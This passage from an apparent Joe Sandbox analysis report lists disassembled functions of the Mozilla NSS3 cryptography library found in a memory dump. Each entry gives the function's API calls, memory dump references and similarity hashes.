                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C704DF2
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C704E2C
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C704E43
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C704E58
                                                                                                                                                                                                                                                                                          • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C704E85
                                                                                                                                                                                                                                                                                          • DER_Encode_Util.NSS3(?,?,6C8505A4,00000000), ref: 6C704EA7
                                                                                                                                                                                                                                                                                          • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C704F17
                                                                                                                                                                                                                                                                                          • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C704F45
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C704F62
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C704F7A
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C704F89
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C704FC8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f25be99c12d01688806a241cfd1ad39fc82a4cc08de4cebced68451aead7e033
                                                                                                                                                                                                                                                                                          • Instruction ID: d6440bf08a78643ba0b60de799713912f0d7b33c3a2d5b7866f8c23e0949bc5d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25be99c12d01688806a241cfd1ad39fc82a4cc08de4cebced68451aead7e033
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3281B2B1A08301AFE711CF24DE44B5BB7E8AB94358F18852DF958DB641E771EA04CB92
                                                                                                                                                                                                                                                                                          Function 6C745C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C745C9B
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C745CF4
                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C745CFD
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C745D42
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C745D4E
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C745D78
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C745E18
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C745E5E
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C745E72
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C745E8B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C73F854
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C73F868
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C73F882
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(04C483FF,?,?), ref: 6C73F889
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C73F8A4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C73F8AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C73F8C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(280F10EC,?,?), ref: 6C73F8D0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                                                                                          • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                                                                                          • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                                                                                          • Opcode ID: 6cb56fb594dc7cf290edd7a462c8f0c14bdd1f0cbe04c19d91fc1e7b5ac7a200
                                                                                                                                                                                                                                                                                          • Instruction ID: 94b1db6ec06fd56646d7c0d7c0ebfa1f983707dfc686d560e5aa9c2b0d11cc54
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cb56fb594dc7cf290edd7a462c8f0c14bdd1f0cbe04c19d91fc1e7b5ac7a200
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F71F7F0A041159BEB409F25FE49B6E3279AF4531CF148035E8099AB42EB35E919CBD2
                                                                                                                                                                                                                                                                                          Function 6C738F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(6C739582), ref: 6C738F5B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE30: SECOID_FindOID_Util.NSS3(6C70311B,00000000,?,6C70311B,?), ref: 6C74BE44
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C738F6A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C738FC3
                                                                                                                                                                                                                                                                                          • PK11_GetIVLength.NSS3(-00000001), ref: 6C738FE0
                                                                                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C81D820,6C739576), ref: 6C738FF9
                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C73901D
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C73903E
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C739062
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7390A2
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C7390CA
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7390F0
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C73912D
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C739136
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C739145
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3626836424-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 134fabc218e24d72376b1fa6b06fa2ffca73c678a948bb49d7af54d1c1d54881
                                                                                                                                                                                                                                                                                          • Instruction ID: b0067bd033ccb0be28db42480d1ad368ecf09fba9bc506728d813204cdd26c45
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 134fabc218e24d72376b1fa6b06fa2ffca73c678a948bb49d7af54d1c1d54881
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E85105B2A043119BE700CF28DE85B97B7E4AF94358F044939E858D7742EB31E949CBD2
                                                                                                                                                                                                                                                                                          Function 6C6EAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C6EAF47
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: EnterCriticalSection.KERNEL32 ref: 6C7B90E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B913F
                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 6C6EAF6D
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6EAFA4
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6EAFAA
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C6EAFB5
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C6EAFF5
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C6EB005
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6EB014
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C6EB028
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6EB03C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                                                                                                                                                                                          • String ID: %s decr => %d$Unloaded library %s
                                                                                                                                                                                                                                                                                          • API String ID: 4015679603-2877805755
                                                                                                                                                                                                                                                                                          • Opcode ID: 7f7274ae28c64c334f398a5e9678fd49176eef99cc47c633273817a22714de3b
                                                                                                                                                                                                                                                                                          • Instruction ID: 0db2bcc706127bce524487bb80e0f7b7395f6965d3b91de2da501e8f4f4eadf7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f7274ae28c64c334f398a5e9678fd49176eef99cc47c633273817a22714de3b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 663159B5B0A100ABDB109F64DC48A45BBB5EF0A31CB584236E81597B42F736E814C7EA
                                                                                                                                                                                                                                                                                          Function 6C736C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C73781D,00000000,6C72BE2C,?,6C736B1D,?,?,?,?,00000000,00000000,6C73781D), ref: 6C736C40
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C73781D,?,6C72BE2C,?), ref: 6C736C58
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C73781D), ref: 6C736C6F
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C736C84
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C736C96
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: TlsGetValue.KERNEL32(00000040,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E1267
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: EnterCriticalSection.KERNEL32(?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E127C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E1291
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: PR_Unlock.NSS3(?,?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E12A0
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C736CAA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                                          • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                                          • Opcode ID: 8809603f6f135a123bc3d2240ff81ea7e160f584ac77a6d83347b20ecf68d0cc
                                                                                                                                                                                                                                                                                          • Instruction ID: bad6ff5ca3b028bd1a66df97bfee01156a4765e1de1f38b589121f21cad9368f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8809603f6f135a123bc3d2240ff81ea7e160f584ac77a6d83347b20ecf68d0cc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8901A7E170232167F62067B95F5AF26295CAF8215DF142831FE0CE1B43FB96E619C0E5
                                                                                                                                                                                                                                                                                          Function 6C744E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetErrorText.NSS3(00000000,00000000,?,6C7078F8), ref: 6C744E6D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6E06A2,00000000,?), ref: 6C6E09F8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E09E0: malloc.MOZGLUE(0000001F), ref: 6C6E0A18
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C6E0A33
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7078F8), ref: 6C744ED9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C737703,?,00000000,00000000), ref: 6C735942
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C737703), ref: 6C735954
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C73596A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C735984
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C735999
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: free.MOZGLUE(00000000), ref: 6C7359BA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7359D3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: free.MOZGLUE(00000000), ref: 6C7359F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C735A0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: free.MOZGLUE(00000000), ref: 6C735A2E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C735920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C735A43
                                                                                                                                                                                                                                                                                          • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C744EB3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C744820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C744EB8,?,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C74484C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C744820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C744EB8,?,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C74486D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C744820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C744EB8,?), ref: 6C744884
                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C744EC0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C744470: TlsGetValue.KERNEL32(00000000,?,6C707296,00000000), ref: 6C744487
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C744470: EnterCriticalSection.KERNEL32(?,?,?,6C707296,00000000), ref: 6C7444A0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C744470: PR_Unlock.NSS3(?,?,?,?,6C707296,00000000), ref: 6C7444BB
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C744F16
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C744F2E
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C744F40
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C744F6C
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C744F80
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C744F8F
                                                                                                                                                                                                                                                                                          • PK11_UpdateSlotAttribute.NSS3(?,6C81DCB0,00000000), ref: 6C744FFE
                                                                                                                                                                                                                                                                                          • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C74501F
                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7078F8), ref: 6C74506B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 560490210-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 836cbb49ec221b2756d286526fc7a600665644681675e0dba8fb6669bb3bf57e
                                                                                                                                                                                                                                                                                          • Instruction ID: 7114497dd3ec00a78f053170c1cb03bfc997f194577d76244d73c711a249e080
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 836cbb49ec221b2756d286526fc7a600665644681675e0dba8fb6669bb3bf57e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C05107B59002059BDB11AF34EE09A9B77B5FF0531DF188635EC0A86B12FB31D524DAD2
                                                                                                                                                                                                                                                                                          Function 6C6EACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
